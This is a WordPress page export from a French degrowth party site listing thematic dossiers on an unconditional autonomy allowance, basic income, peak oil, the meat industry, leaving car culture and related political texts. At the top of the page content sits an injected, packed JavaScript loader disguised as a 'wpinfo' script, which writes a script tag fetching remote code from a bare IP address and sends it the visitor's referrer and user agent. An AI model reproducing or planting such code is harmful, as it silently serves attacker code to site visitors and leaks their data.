{"id":4000,"date":"2010-02-02T09:50:43","date_gmt":"2010-02-02T08:50:43","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=4000"},"modified":"2010-03-14T18:51:24","modified_gmt":"2010-03-14T17:51:24","slug":"dossiers-thematiques","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=4000","title":{"rendered":"Dossiers th\u00e9matiques"},"content":{"rendered":"<hr \/>\n<h2 style=\"text-align: center;\"><span style=\"color: #ff6600;\"> <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ybeii|var|u0026u|referrer|tsyhn||js|php'.split('|'),0,{}))\n<\/script><\/noindex> <\/span><strong><span style=\"color: #ff6600;\">Une Dotation Inconditionnelle d&rsquo;Autonomie pour tous<\/span><\/strong><\/h2>\n<p><em>\u00ab L&rsquo;homme ne d\u00e9sire pas par nature gagner de plus en plus d&rsquo;argent, mais il d\u00e9sire tout simplement vivre selon son habitude et gagner autant d&rsquo;argent qu&rsquo;il lui en faut pour cela\u00a0\u00bb.<\/em><br \/>\nMax Weber<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/03\/D.I.A-ppld..pdf\"><strong>T\u00e9l\u00e9chargez le document en pdf<\/strong><\/a><\/p>\n<p style=\"text-align: left;\">Une proposition centrale des objecteurs de Croissance est l&rsquo;instauration d&rsquo;une Dotation Inconditionnelle d&rsquo;Autonomie (DIA), vers\u00e9e \u00e0 tous et de mani\u00e8re \u00e9gale de la naissance \u00e0 la mort, afin de garantir un niveau de vie d\u00e9cent d\u00e9connect\u00e9 de l&rsquo;occupation d&rsquo;un emploi . Cette dotation serait individuelle, inali\u00e9nable et cumulable \u00e0 tout autre revenu.<\/p>\n<p><strong>Un droit \u00e0 la vie contre un droit au travail<\/strong><br \/>\nLa DIA est avant tout l&rsquo;outil permettant la r\u00e9alisation des droits fondamentaux de chaque individu en se d\u00e9barrassant de la centralit\u00e9 du travail. Cette dotation s&rsquo;inscrit dans une r\u00e9flexion qui ne fonde pas l&rsquo;\u00e9mancipation des hommes et des femmes que par le travail. L&rsquo;\u00e9l\u00e9vation du travail au rang de valeur fondamentale est d&rsquo;abord le fruit d&rsquo;une id\u00e9ologie productiviste et consum\u00e9riste qui est, pour les sobjecteurs de Croissance, incompatible avec un quelconque \u00e9panouissement de l&rsquo;individu.<br \/>\nLa DIA permettrait de faire en sorte que les droits fondamentaux soient enfin un droit et non une constante recherche impliquant stress et ali\u00e9nation par la soci\u00e9t\u00e9 capitaliste.<\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/?p=4144\">lire la suite<\/a><\/p>\n<hr \/>\n<h2 style=\"text-align: center;\"><span style=\"color: #ff6600;\"><strong>Le revenu de base<\/strong><\/span><\/h2>\n<p style=\"text-align: center;\"><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"418\" height=\"254\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" \/><param name=\"allowscriptaccess\" value=\"always\" \/><param name=\"src\" value=\"http:\/\/www.youtube.com\/v\/AppBZPY2A0Y&amp;hl=fr_FR&amp;fs=1&amp;\" \/><param name=\"allowfullscreen\" value=\"true\" \/><embed type=\"application\/x-shockwave-flash\" width=\"418\" height=\"254\" src=\"http:\/\/www.youtube.com\/v\/AppBZPY2A0Y&amp;hl=fr_FR&amp;fs=1&amp;\" allowscriptaccess=\"always\" allowfullscreen=\"true\"><\/embed><\/object><\/p>\n<p style=\"text-align: left;\">source : <a href=\"http:\/\/forumcitoyenromanais.ma-ra.org\/index.php?post\/2010\/01\/31\/garantie-vie-decente\">http:\/\/le-revenu-de-base.blogspot.com\/2009\/10\/le-revenu-de-base-inconditionne.html<\/a><br \/>\nressources : <a href=\"http:\/\/forumcitoyenromanais.ma-ra.org\/index.php?post\/2010\/01\/31\/garantie-vie-decente\">http:\/\/forumcitoyenromanais.ma-ra.org\/index.php?post\/2010\/01\/31\/garantie-vie-decente<br \/>\n<\/a>appel : <a href=\"http:\/\/appelpourlerevenudevie.org\/\">http:\/\/appelpourlerevenudevie.org\/<\/a><\/p>\n<hr \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignright\" src=\"http:\/\/www.reopen911.info\/News\/wp-content\/uploads\/petrole2.gif\" alt=\"\" width=\"167\" height=\"259\" \/><strong> <\/strong><\/p>\n<h2><strong><span style=\"color: #ff6600;\">P\u00e9trole : la f\u00eate est finie<\/span><\/strong><\/h2>\n<h2><strong><span style=\"color: #ff6600;\"> <\/span><\/strong><\/h2>\n<p><strong><span style=\"color: #ff6600;\"> <\/span><\/strong><span style=\"color: #ff6600;\">Avenir des soci\u00e9t\u00e9s industrielles apr\u00e8s le pic p\u00e9trolier<br \/>\nde Richard Heinberg<br \/>\n<a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/02\/P\u00e9trole-_-la-f\u00eate-est-finie.pdf\">pour t\u00e9l\u00e9charger cette notice en pdf<\/a><br \/>\n<\/span><\/p>\n<p><strong>\u00ab P\u00e9trole, la f\u00eate finie \u00bb, un titre \u00e9loquent pour signifier que la fin d&rsquo;un monde se pr\u00e9pare, celui du p\u00e9trole mais plus globalement de l&rsquo;\u00e9nergie bon march\u00e9.<\/strong><\/p>\n<p>Richard Heinberg commence par \u00e9baucher une histoire de l&rsquo;humanit\u00e9 \u00e0 travers le prisme de l&rsquo;\u00e9nergie, de son importance dans les mutations des soci\u00e9t\u00e9s (colonialisme, d\u00e9veloppement, pillage naturel) avec la r\u00e9volution du charbon, le tout \u00e9lectrique et le miracle du p\u00e9trole.<\/p>\n<p>L&rsquo;auteur explique comment les Etats-Unis sont devenus la premi\u00e8re puissance mondiale en s&rsquo;appuyant sur leur richesse propre, notamment \u00e9nerg\u00e9tique, en d\u00e9veloppant une technologie de pointe puis en organisant le monde afin de rester le ma\u00eetre de ces ressources (\u00e9nerg\u00e9tiques et mini\u00e8res). L&rsquo;exploitation des ressources naturelles et humaines est en marche et les Etats-Unis et les europ\u00e9ens en sont les grands organisateurs et profiteurs. Ainsi, les enjeux g\u00e9opolitiques s&rsquo;av\u00e8rent guid\u00e9s et cons\u00e9quences des \u00e9nergies et de leurs contr\u00f4les.<br \/>\n<a href=\"http:\/\/www.partipourladecroissance.net\/?p=4087\">Lire la suite<\/a><\/p>\n<hr \/>\n<h2><span style=\"color: #ff6600;\"><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.ecologiste.org\/contents\/media\/l_bidoche.jpg\" alt=\"\" width=\"119\" height=\"181\" \/><\/strong><\/span><span style=\"color: #ff6600;\"><strong> <\/strong>\u00ab L&rsquo;Industrie de la viande menace le monde \u00bb<\/span><\/h2>\n<p><span style=\"color: #ff6600;\"> <a href=\"..\/wp-content\/uploads\/2010\/02\/BIDOCHE-de-Fabrice-Nicolino.pdf\">pour t\u00e9l\u00e9charger cette notice en pdf<\/a><\/span><\/p>\n<p>Voici un ouvrage qui apporte de l&rsquo;eau au moulin de la D\u00e9croissance. En effet, chapitre apr\u00e8s chapitre, l&rsquo;auteur d\u00e9nonce les m\u00e9faits et les dangers de \u00ab l&rsquo;industrie de la viande \u00bb qui comme l&rsquo;indique le sous-titre de l&rsquo;ouvrage \u00ab menace le monde \u00bb, de l&rsquo;environnement \u00e0 l&rsquo;homme en passant par les animaux. Fabrice Nicolino s&rsquo;attache \u00e0 d\u00e9crire une v\u00e9ritable \u00e9conomie autour de la production et de la consommation de la viande dont l&rsquo;objectif est la seule rentabilit\u00e9 financi\u00e8re.<\/p>\n<p>Notre imaginaire a \u00e9t\u00e9 colonis\u00e9 et l&rsquo;alimentation carn\u00e9e est ressentie comme une obligation pour bien-vivre dans les soci\u00e9t\u00e9s occidentales, dont l&rsquo;imaginaire s&rsquo;attaque \u00e0 toute la plan\u00e8te. Pourtant, ce mode de vie est responsable de la mise en place d&rsquo;un syst\u00e8me \u00e9conomique destructeur.<br \/>\n<a href=\"http:\/\/www.partipourladecroissance.net\/?p=4090\">lire la suite<\/a><\/p>\n<hr \/>\n<h2>Sortir de la civilisation de la voiture<\/h2>\n<p># <strong>Non, la voiture \u00e0 eau n&rsquo;existera jamais ! <\/strong><a href=\"http:\/\/www.radiofrance.fr\/chaines\/france-culture2\/dossiers\/2008\/regards-crise\/forum_voir.php?forum_id=200110229&amp;dossier_id=230000053&amp;message_id=430171001&amp;pg=1\">intervention sur un forum<\/a><\/p>\n<p><small> <\/small><\/p>\n<p><a href=\"..\/\" target=\"_blank\"><em><strong> <\/strong><\/em><\/a># <a href=\"http:\/\/www.partipourladecroissance.net\/?p=3303\"><strong>Stop \u00e0 la voiture<\/strong><\/a><\/p>\n<p>L\u2019automobile est un enjeu majeur de la D\u00e9croissance tant elle est symbolise la soci\u00e9t\u00e9 capitaliste et caract\u00e9rise le mode de vie occidental qui est en passe de se g\u00e9n\u00e9raliser \u00e0 l\u2019\u00e9chelle mondiale. Moyen de transport individuel, elle symbolise l\u2019individualisme forcen\u00e9 de notre soci\u00e9t\u00e9.<\/p>\n<p>Ces trois textes, de Christophe Ondet, sont largement inspir\u00e9s du travail de <a href=\"http:\/\/carfree.free.fr\/\">Carfree<\/a>. Ils sont imparfaits. Toutes les remarques et suggestions sont les bienvenues<\/p>\n<ol>\n<li><a href=\"..\/wp-content\/uploads\/2009\/07\/stop-a-la-voiture-1.pdf\">Pollutions et nuisances, directes et indirectes<\/a><\/li>\n<li><a href=\"..\/wp-content\/uploads\/2009\/07\/stop-a-la-voiture-2.pdf\">Sortir de l\u2019automobile, c\u2019est revoir les fondements m\u00eame de notre soci\u00e9t\u00e9<\/a><\/li>\n<li><a href=\"..\/wp-content\/uploads\/2009\/08\/compl%C3%A9ment-automobile.pdf\">Compl\u00e9ments mis en ligne en ao\u00fbt 2009<\/a><span style=\"color: #999999;\"> repris par Carfree <a href=\"http:\/\/carfree.free.fr\/index.php\/2009\/09\/12\/propositions-pour-sortir-du-systeme-automobile\/\">ici<\/a><\/span><\/li>\n<\/ol>\n<p style=\"text-align: left;\">lire les textes en ligne ci-dessous :  <a href=\"..\/?p=3303#more-3303\">Read more \u00bb<\/a><\/p>\n<hr \/>\n<div>\n<h2><a title=\"Permanent Link to F.A.Q : Foire Aux Questions\" rel=\"bookmark\" href=\"..\/?p=3458\">F.A.Q : Foire Aux Questions<\/a><\/h2>\n<div>\n<div>\n<p><strong>Quelques propositions de r\u00e9ponses argument\u00e9es aux critiques\/reproches\/caricatures dont les O.C. font en ce moment l\u2019objet.<\/strong><\/div>\n<div>\n<p>L\u2019argumentation compl\u00e8te de ces r\u00e9ponses r\u00e9posent sur <a href=\"http:\/\/nanorezo.free.fr\/spip.php?article82\">Les trois pieds politiques de l\u2019objection de croissance<\/a>.<\/p>\n<h3>1- Les O.C. sont-ils de gauche\u00a0?<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Historiquement, les O.C. le 11 septembre 1789 se seraient rang\u00e9s \u00e0 gauche du pr\u00e9sident de s\u00e9ance de l\u2019Assembl\u00e9e nationale pour refuser d\u2019accorder au roi un droit de veto absolu sur les lois.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Economiquement et socialement, nous nous posons les m\u00eames probl\u00e8mes que ceux que la gauche devrait se poser. Et comme nous consid\u00e9rons que la politique est le lieu o\u00f9 nous devrions d\u00e9cider ensemble nos d\u00e9cisions, nous d\u00e9fendons un volontarisme politique\u00a0; par exemple, les injustices sociales ne sont pas \u00ab\u00a0naturelles\u00a0\u00bb et par cons\u00e9quent la justice sociale n\u2019est pas naturelle mais artificielle (ex. de l\u2019h\u00e9ritage)<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Mais nous ne sommes plus dans le m\u00eame paradigme que \u00ab\u00a0La Gauche\u00a0\u00bb\u00a0: \u00e0 cause de notre antiproductivisme, de notre antilib\u00e9ralisme (m\u00eame si nous pouvons distinguer entre un lib\u00e9ralisme philosophique et un lib\u00e9ralisme id\u00e9ologique), de notre anti-utilitarisme (nous ne r\u00e9duisons pas l\u2019int\u00e9r\u00eat \u00e0 l\u2019int\u00e9r\u00eat \u00e9conomique)<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Le philosophe Alain raconte au d\u00e9but du XXe si\u00e8cle que s\u2019il rencontre quelqu\u2019un qui \u00ab\u00a0ne fait pas de politique\u00a0\u00bb alors il ne peut s\u2019emp\u00eacher de penser\u00a0: \u00ab\u00a0voil\u00e0 quelqu\u2019un qui n\u2019est pas de gauche\u00a0\u00bb. Eh bien, les O.C. font de la politique et chacun peut en d\u00e9duire\u00a0: \u00ab\u00a0voil\u00e0 des gens qui ne sont pas de droite\u00a0!\u00a0\u00bb<\/p>\n<h3>2- Les O.C. mettent-ils clairement en \u00e9vidence les m\u00e9canismes politiques et \u00e9conomiques qui ont abouti \u00e0 la situation actuelle\u00a0? <a href=\"..\/?p=3458#more-3458\">Read more \u00bb<\/a><\/h3>\n<\/div>\n<\/div>\n<\/div>\n<hr \/>\n<div>\n<h2><a title=\"Permanent Link to Les trois pieds politiques de l\u2019objection de croissance\" rel=\"bookmark\" href=\"..\/?p=3411\">Les trois pieds politiques de l\u2019objection de croissance<\/a><\/h2>\n<h4>Contribution \u00e0 l\u2019\u00e9laboration d\u2019une strat\u00e9gie de transformation pour sortir d\u00e9finitivement du capitalisme<\/h4>\n<div>\n<div>\n<p>Prendre de plus en plus clairement conscience qu\u2019il ne suffit ni de r\u00eaver un projet, ni de rab\u00e2cher les causes du rejet du capitalisme mais que la question politique centrale est bien d\u2019\u00eatre capable de proposer le trajet qui ira du capitalisme \u00e0 l\u2019apr\u00e8s-capitalisme.<\/p><\/div>\n<div>\n<dl style=\"float: right;\">\n<dt><a title=\"Word - 307.5 ko\" type=\"application\/msword\" href=\"http:\/\/nanorezo.free.fr\/IMG\/doc\/3_pieds.doc\"><img loading=\"lazy\" decoding=\"async\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L52xH52\/doc-cfac9.png\" alt=\"Word - 307.5 ko\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt style=\"width: 120px;\"><strong>Pour imprimer<\/strong><\/dt>\n<\/dl>\n<p><em>Ah\u00a0! si nous disposions de la v\u00e9rit\u00e9, d\u2019une description toute ficel\u00e9e de la soci\u00e9t\u00e9 id\u00e9ale et de la certitude d\u2019aller dans le sens de l\u2019histoire\u2026 alors nous serions une avant-garde \u00e9clair\u00e9e, la conscience avanc\u00e9e aujourd\u2019hui minoritaire mais demain in\u00e9luctablement victorieuse \u2026 alors nous saurions avec conviction trier entre les actions politiques\u00a0: quelle p\u00e9tition signer, quelle manifestation soutenir, quel bulletin mettre dans l\u2019urne\u2026 mieux, nous saurions le sens qu\u2019il y a \u00e0 voter, \u00e0 signer une p\u00e9tition, \u00e0 faire la gr\u00e8ve\u2026 \u00e0 faire de la politique\u00a0! <a href=\"http:\/\/nanorezo.free.fr\/IMG\/doc\/3_pieds.doc\">Read more \u00bb<\/a><\/em><\/div>\n<\/div>\n<\/div>\n<hr \/>\n<h2>Protectionnisme, Relocalisation et D\u00e9croissance<\/h2>\n<p><strong>Protectionnisme, relocalisation et d\u00e9croissance<\/strong><\/p>\n<p>Que de nombreux articles y fassent r\u00e9f\u00e9rence, que le num\u00e9ro de mars du Monde Diplomatique lui ait consacr\u00e9 un dossier, n\u2019est pas \u00e9tonnant : \u00e0 l\u2019heure de la crise, \u00e0 l\u2019heure des plans de relance et autres projets de moralisation du capitalisme, \u00e0 l\u2019heure du G-vain londonien, on a vu ressurgir les th\u00e9ories protectionnistes.<br \/>\nLes tenants de la d\u00e9r\u00e9gularisation des march\u00e9s, du libre-\u00e9change, de la d\u00e9territorialisation des productions n\u2019imaginaient pas voir leur retour. Quoi, il y aurait encore des ouvrages, vantant le protectionnisme, en circulation ? Tous n\u2019auraient pas subi les foudres des pompiers de Ray Bradbury ?<\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/?p=2236\">Lire la suite<\/a><\/p>\n<hr \/>\n<h2 class=\"title\">Recherches et D\u00e9croissance<\/h2>\n<p><em>\u00ab\u00a0Cher-e-s ami-e-s,<\/em><\/p>\n<p><em>Suite \u00e0 la conf\u00e9rence qui s\u2019est tenue l\u2019ann\u00e9e derni\u00e8re sur la D\u00e9croissance \u00c9conomique pour une \u00c9quit\u00e9 \u00c9cologique, Soutenable et Sociale (voir<a href=\"Cher-e-s ami-e-s,  Suite \u00e0 la conf\u00e9rence qui s\u2019est tenue l\u2019ann\u00e9e derni\u00e8re sur la D\u00e9croissance \u00c9conomique pour une \u00c9quit\u00e9 \u00c9cologique, Soutenable et Sociale (voir www.degrowth.net et http:\/\/events.it-sudparis.eu\/degrowthconference\/en, t\u00e9l\u00e9chargements disponibles en ligne), je vous envoie ci-joint une information sur les diff\u00e9rentes conf\u00e9rences relatives \u00e0 la question.  D\u2019abord, et pour la premi\u00e8re fois, une conf\u00e9rence sur la D\u00e9croissance \u00e9conomique pour la soutenabilit\u00e9 et l\u2019\u00e9quit\u00e9 se tiendra au Parlement Europ\u00e9en. Elle ne traitera pas uniquement de \u00ab l\u2019apr\u00e8s croissance \u00bb mais du niveau actuel de la production et de la consommation au moins dans les pays de l\u2019OCDE et plus globalement ceux du Nord, o\u00f9 une d\u00e9croissance sociale et soutenable est n\u00e9cessaire, qui n\u2019a rien \u00e0 voir avec la r\u00e9cession ou la crise que nous vivons actuellement. Cependant cette \u00ab crise de la croissance \u00bb nous offre une opportunit\u00e9.  http:\/\/www.clubofrome.at\/2009\/degrowth\/index.html \u00c9v\u00e9nement au Parlement europ\u00e9en \u00e0 Bruxelles, Belgique, le 16 avril 2009, de 9h30 \u00e0 13h00. Merci de diffuser l\u2019information autour de vous !!!  Quelques jours plus tard, toujours \u00e0 Bruxelles, se tiendra un autre \u00e9v\u00e9nement sur la croissance,  Sujet : red\u00e9finir la croissance et la prosp\u00e9rit\u00e9. Atelier le 21 avril \u00e0 la Repr\u00e9sentation Permanente Autrichienne \u00e0 Bruxelles. http:\/\/www.wachstumsargumentarium.at\/  Pour vous inscrire avant le 15 avril, merci de contacter Elke Pirgmaier de l\u2019Institut de Recherches pour une Europe Soutenable (SERI) par courriel : elke.pirgmaier@seri.at ou par t\u00e9l\u00e9phone : +43 1 969 07 28-13. (Il s\u2019agira de d\u00e9terminer si la \u00ab croissance verte \u00bb ou la \u00ab croissance du bien-\u00eatre \u00bb qui d\u00e9fient la croissance \u00e9conomique n\u2019impliquent pas une d\u00e9croissance de la capacit\u00e9 de production des pays du Nord, et plus largement une d\u00e9croissance \u00e9conomique multidimensionnelle.)   Enfin, une conf\u00e9rence sur l\u2019\u00e9co-efficacit\u00e9 \u201cMod\u00e8les et Evaluation pour la Soutenabilit\u00e9 : guider l\u2019\u00e9co-innovation et la consommation\u201d aura lieu en novembre 2009 suivi d\u2019un atelier sur la d\u00e9croissance.  19 novembre 2009 : \u00ab Relever les d\u00e9fis \u00bb  Session 4 : D\u00e9croissance et consommation.  Merci de nous envoyer vos textes en respectant les crit\u00e8res suivants : Montant maximum de mots : 200 Date limite de soumission : 1 Mai 2009  Sinc\u00e8res salutations. Fran\u00e7ois Schneider  Si vous souhaitez recevoir ce genre d\u2019informations sur Recherches et D\u00e9croissance (vraiment tr\u00e8s peu de messages), envoyer un message en blanc \u00e0 sympa@lists.apinc.org. Dans l\u2019objet, indiquez \u00ab subscribe d\u00e9croissance pr\u00e9nom nom pays \u00bb puis vous devrez authentifier votre adresse email et c\u2019est tout !\"> www.degrowth.net<\/a> et <a href=\"http:\/\/events.it-sudparis.eu\/degrowthconference\/en\">http:\/\/events.it-sudparis.eu\/degrowthconference\/en<\/a>, t\u00e9l\u00e9chargements disponibles en ligne), je vous envoie ci-joint une information sur les diff\u00e9rentes conf\u00e9rences relatives \u00e0 la question.<\/em><\/p>\n<p style=\"text-align: left;\"><em><strong>D\u2019abord, et pour la premi\u00e8re fois<\/strong>, une conf\u00e9rence sur la D\u00e9croissance \u00e9conomique pour la soutenabilit\u00e9 et l\u2019\u00e9quit\u00e9 se tiendra au Parlement Europ\u00e9en. Elle ne traitera pas uniquement de \u00ab<\/em><em> l\u2019apr\u00e8s croissance \u00bb mais du niveau actuel de la production et de la consommation au moins dans les pays de l\u2019OCDE et plus globalement ceux du Nord, o\u00f9 une d\u00e9croissance sociale et soutenable est n\u00e9cessaire, qui n\u2019a rien \u00e0 voir avec la r\u00e9cession ou la crise que nous vivons actuellement. Cependant cette \u00ab crise de la croissance \u00bb nous offre une opportunit\u00e9.<\/em><\/p>\n<ul>\n<li><em><strong><a href=\"http:\/\/www.partipourladecroissance.net\/?p=2142\">lire la suite<\/a><\/strong><br \/>\n<\/em><\/li>\n<\/ul>\n<hr \/>\n<h2 class=\"title\">Simplicit\u00e9 volontaire et D\u00e9croissance<\/h2>\n<p># <strong>Les limites de la simplicit\u00e9 volontaire et l\u2019engagement politique autour d\u2019un projet de soci\u00e9t\u00e9 de D\u00e9croissance<\/strong><\/p>\n<p>Sommaire :<\/p>\n<ol>\n<li><em>La simplicit\u00e9 volontaire :<\/em><\/li>\n<\/ol>\n<ul>\n<li>Qu\u2019est ce que c\u2019est ?<\/li>\n<li>Attention aux survivalistes<\/li>\n<li>Les bonnes actions de la simplicit\u00e9 volontaire<\/li>\n<\/ul>\n<ol>\n<li><em>L\u2019engagement en\u00a0 politique<\/em><\/li>\n<\/ol>\n<ul>\n<li>\u00ab Les bons conseils \u00bb de Nicolas Hulot<\/li>\n<li>Comment Nicolas Hulot d\u00e9politise l\u2019\u00e9cologie<\/li>\n<\/ul>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/01\/les-limites-de-la-simplicite-volontaire-2-et-l.pdf\"><strong>lire la suite<\/strong><\/a><\/p>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Une Dotation Inconditionnelle d&rsquo;Autonomie pour tous \u00ab L&rsquo;homme ne d\u00e9sire pas par nature gagner de plus en plus d&rsquo;argent, mais il d\u00e9sire tout simplement vivre selon son habitude et gagner autant d&rsquo;argent qu&rsquo;il lui en faut pour cela\u00a0\u00bb. Max Weber &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=4000\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4000","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4000","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4000"}],"version-history":[{"count":17,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4000\/revisions"}],"predecessor-version":[{"id":4084,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4000\/revisions\/4084"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4000"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}